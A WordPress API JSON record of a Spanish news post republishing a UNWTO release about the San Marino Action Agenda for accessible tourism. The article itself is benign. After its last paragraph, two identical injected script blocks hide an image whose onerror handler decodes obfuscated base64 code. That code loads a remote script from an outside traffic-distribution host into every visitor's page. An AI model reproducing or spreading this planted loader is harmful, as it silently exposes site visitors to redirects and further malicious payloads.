{"id":3326,"date":"2023-11-22T13:22:28","date_gmt":"2023-11-22T16:22:28","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3326"},"modified":"2025-08-14T00:04:54","modified_gmt":"2025-08-14T03:04:54","slug":"la-omt-presenta-la-agenda-de-accion-de-san-marino-a-fin-de-lograr-un-turismo-accesible-para-todos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3326","title":{"rendered":"LA OMT PRESENTA LA AGENDA DE ACCI\u00d3N DE SAN MARINO A FIN DE LOGRAR UN TURISMO ACCESIBLE PARA TODOS"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#0a4f77\"><em>Dado que aproximadamente 1 300 millones de personas en todo el mundo experimentan discapacidad considerable, la OMT ha aunado esfuerzos una vez m\u00e1s con asociados clave a fin de lograr un turismo m\u00e1s accesible para todos.<\/em><\/h4>\n\n\n\n<p>La Conferencia Europea sobre Turismo Accesible de la OMT se celebr\u00f3 por segunda vez en San Marino (16 y 17 de noviembre de 2023), impulsada por el&nbsp;<strong>Ministerio de Turismo de Italia&nbsp;<\/strong>y en colaboraci\u00f3n con el&nbsp;<strong>Centro Europeo de Recursos en Accesibilidad<\/strong>&nbsp;\u2013 AccessibleEU, una iniciativa emblem\u00e1tica de la Comisi\u00f3n Europea. De ella surgi\u00f3 la Agenda de San Marino, que se trata de un plan de acci\u00f3n claro para la inclusi\u00f3n de la discapacidad en todos los \u00e1mbitos del sector tur\u00edstico. &nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Promover la accesibilidad para los destinos, las empresas y las personas&nbsp;<strong>&nbsp;<\/strong><\/h2>\n\n\n\n<p>Desde que San Marino organiz\u00f3 la primera conferencia, en 2014, muchos destinos y empresas han realizado grandes progresos para mejorar la accesibilidad, avanzando en la consecuci\u00f3n de un turismo para todos.<\/p>\n\n\n\n<p>En este evento de dos d\u00edas, m\u00e1s de 200 delegados examinaron los avances normativos, tales como la norma internacional&nbsp;<strong>ISO 21902<\/strong>, que atiende las necesidades tanto de las comunidades receptoras como de los visitantes, y cubre toda la cadena de valor del sector tur\u00edstico. El evento cont\u00f3 con una&nbsp;<strong>Mesa redonda ministerial<\/strong>, que congreg\u00f3 a San Marino, Italia, la Rep\u00fablica de Corea, Uzbekist\u00e1n, Chequia e Israel, a fin de discutir el papel que desempe\u00f1an los Gobiernos al promover la accesibilidad a trav\u00e9s de pol\u00edticas, estrategias y normas.<\/p>\n\n\n\n<p>La innovaci\u00f3n en turismo accesible fue uno de los temas clave, y los oradores presentaron nuevas soluciones en el acceso al transporte, el ocio, el sector RICE y los servicios tur\u00edsticos. Estas incluyeron la ayuda del sistema SEATRAC para que los usuarios de sillas de ruedas pudieran ba\u00f1arse en Grecia, los puntos t\u00e1ctiles del Braille en toda la ciudad y los primeros gu\u00edas tur\u00edsticos acreditados para personas invidentes en Ciudad del Cabo, y el muelle plenamente accesible en Rimini.<\/p>\n\n\n\n<p>La conferencia ha fortalecido las redes internacionales y ha mostrado a San Marino como un destino inclusivo, un punto de referencia para el turismo accesible y el \u00fanico Estado Miembro de la OMT que ha organizado dos Conferencias Internacionales sobre Turismo Accesible. &nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Oportunidades no explotadas<\/h2>\n\n\n\n<p>Sin embargo, muchos destinos siguen sin considerar que la accesibilidad puede aportar beneficios, a pesar de que en 2023 existe un mercado de 1 300 millones de personas con discapacidad considerable, y de que se espera que 1 de cada 6 personas alcance la edad de 65 a\u00f1os en 2050. Solo en Europa, los \u00abbaby boomers\u00bb ya representan m\u00e1s de un tercio de la poblaci\u00f3n de la UE, y el 70% de los ciudadanos de la UE con discapacidad tienen recursos financieros para viajar.&nbsp;<\/p>\n\n\n\n<p>Los expertos en este \u00e1mbito han debatido la mejor manera de atender las necesidades de este mercado creciente y de ofrecer experiencias tur\u00edsticas en el esp\u00edritu del Dise\u00f1o Universal, para que puedan gozar de ellas todas las personas, con o sin discapacidad. Los debates tambi\u00e9n se han centrado en la importancia que revisten la inclusividad social y la accesibilidad para el turismo sostenible, y los inmensos beneficios econ\u00f3micos que puede representar para el sector el establecimiento de mejores medidas de acceso.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Agenda de Acci\u00f3n de San Marino 2030&nbsp;<\/h2>\n\n\n\n<p>Se considera que la Agenda de Acci\u00f3n puede cambiar la situaci\u00f3n en lo que respecta a la inclusi\u00f3n de la discapacidad y a la contribuci\u00f3n del turismo a la consecuci\u00f3n de los Objetivos de Desarrollo Sostenible, con un compromiso de los participantes en la conferencia de obtener resultados concretos.<\/p>\n\n\n\n<p>Esto incluye medidas para promover la formaci\u00f3n, elaborar sistemas de medici\u00f3n y sensibilizar en mayor grado acerca de las ventajas de un lugar de trabajo diverso. &nbsp;&nbsp;<\/p>\n\n\n\n<p>Las partes interesadas armonizar\u00e1n sus estrategias comerciales y de marketing&nbsp; y utilizar\u00e1n soluciones digitales para ayudar a que las experiencias accesibles lleguen a todos los clientes y para integrar la accesibilidad en el desarrollo de sus productos y los procesos de toma de decisiones.<\/p>\n\n\n\n<p>Como parte del legado de la conferencia, la OMT publicar\u00e1 en 2004 un&nbsp;<strong>Compendio de mejores pr\u00e1cticas mostradas en San Marino<\/strong>, en colaboraci\u00f3n con AccessibleEU y la ENAT.<\/p>\n\n\n\n<p>En los pr\u00f3ximos a\u00f1os tambi\u00e9n se llevar\u00e1n a cabo nuevos estudios sobre la accesibilidad en el turismo cultural y de naturaleza, las soluciones digitales y otras buenas pr\u00e1cticas.<\/p>\n\n\n\n<p><strong><em><a href=\"https:\/\/www.unwto.org\/es\/news\/la-omt-presenta-la-agenda-de-accion-de-san-marino-a-fin-de-lograr-un-turismo-accesible-para-todos\" title=\"\">OMT<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Dado que aproximadamente 1 300 millones de personas en todo el mundo experimentan discapacidad considerable, la OMT ha aunado esfuerzos una vez m\u00e1s con asociados clave a fin de lograr un turismo m\u00e1s accesible para todos. La Conferencia Europea sobre Turismo Accesible de la OMT se celebr\u00f3 por segunda vez en San Marino (16 y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3327,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-3326","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-temas-relacionados"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3326"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3326"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3326\/revisions"}],"predecessor-version":[{"id":6913,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3326\/revisions\/6913"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3327"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}